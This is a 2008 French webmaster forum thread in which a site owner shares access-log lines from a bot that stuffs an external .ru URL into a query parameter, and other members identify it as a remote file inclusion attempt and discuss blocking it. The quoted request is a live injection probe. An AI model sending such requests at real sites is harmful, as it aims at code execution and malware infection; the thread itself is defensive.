| |
|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
danyqc73
Nouveau WRInaute
Inscrit le: 08 Fév 2008
Messages: 18
Localisation: Québec
|
 Posté le : Mar Mar 04, 2008 16:55 Sujet du message: Robot avec requete étrange sur mon site |
|
|
Bonjour,
J'espere que je suis dans la bonne catégorie. Il y a un robot qui passe sur mon serveur. Il lance environ 150 requetes en 2 minutes. Cependant une requete sur deux est faite avec une url impossible.
Exemple :
212.80.70.194 - - [04/Mar/2008:08:08:08 -0500] "GET /Forum?section=7&idsujet=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&pagemessage=1 HTTP/1.0" 500 1761
La requete propre devrait etre comme suit :
212.80.70.194 - - [04/Mar/2008:08:08:08 -0500] "GET /Forum?section=7&idsujet=2&pagemessage=1 HTTP/1.0" 200 1761
J'ignore pourquoi il ajoute une autre url au milieu de sa requete. Et en plus ce n'est jamais le meme url qu'il ajoute au milieu.
Il utilise aussi cet ip :
62.42.232.62
66.36.160.110
212.80.70.194
J'ai fait des recherche avec l'ip mais j'ai rien trouvé. Es-ce que quelqu'un pourrait me donner une piste ou une direction de quoi chercher ?
merci |
|
| |
|
 |
cthierry
WRInaute accro
Inscrit le: 15 Jan 2005
Messages: 1638
Localisation: seine et marne
|
| Posté le : Mar Mar 04, 2008 19:19 Sujet du message: Robot avec requete étrange sur mon site |
|
|
Il essaie de t'injecter une page qui mène direct sur une verole.
deja parlé dans un autre post y a pas si longtemps. |
|
| |
|
|
Leonick
WRInaute accro
Inscrit le: 08 Aoû 2004
Messages: 8427
Localisation: Val de Marne
|
| Posté le : Mar Mar 04, 2008 21:10 Sujet du message: Robot avec requete étrange sur mon site |
|
|
Je remarque, effectivement, une recrudescence de tentatives d'injection de code avec les includes. Sauf que je n'utilise aucun include dans mes url 
donc je bloque avec le htaccess |
|
| |
|
|
danyqc73
Nouveau WRInaute
Inscrit le: 08 Fév 2008
Messages: 18
Localisation: Québec
|
| Posté le : Mar Mar 04, 2008 21:42 Sujet du message: Robot avec requete étrange sur mon site |
|
|
Merci pour les infos.
Je suis pas assez calé pour savoir de quel facon ca peux m'infecter. À premiere vu c'est pas trop dangereux, mon serveur retourne une erreur 500. Du coté serveur le getParameter("idsujet") recoit un contenu invalide et ca plante sans plus de domage.
C'est seulement tanant de voir soudainement apparaitre 150 visiteurs en meme temps, ca ne fait pas trop crédible.
Je ne sais pas trop quoi chercher sur le forum, mais si vous avez le lien vers la discussion dont cthierry parle envoyer la moi svp. Ca me donnera une piste de solution.
Dans mon cas j'utilise apache-tomcat-5.5.17 et ca ne semble pas supporter les .htaccess 
Merci |
|
| |
|
|
tofm2
WRInaute accro
Inscrit le: 09 Avr 2005
Messages: 1253
Localisation: Reuben el Arkhab
|
| Posté le : Mar Mar 04, 2008 22:15 Sujet du message: Robot avec requete étrange sur mon site |
|
|
| cthierry a écrit: |
Il essaie de t'injecter une page qui mène direct sur une verole.
deja parlé dans un autre post y a pas si longtemps. |
serait ce de celui - ci dont tu parles ?
http://www.webrankinfo.com/forums/viewtopic_89698.htm
si oui, je suis preneur de toute technique pour tenter une parade
| Leonick a écrit: |
Je remarque, effectivement, une recrudescence de tentatives d'injection de code avec les includes. Sauf que je n'utilise aucun include dans mes url
donc je bloque avec le htaccess |
Leonick de quoi veux tu parler avec .htaccess dans ce cas de figure ??
merci |
|
| |
|
|
| |
|
|
|
|
Autres sujets de discussion :
Définitions :
|
|
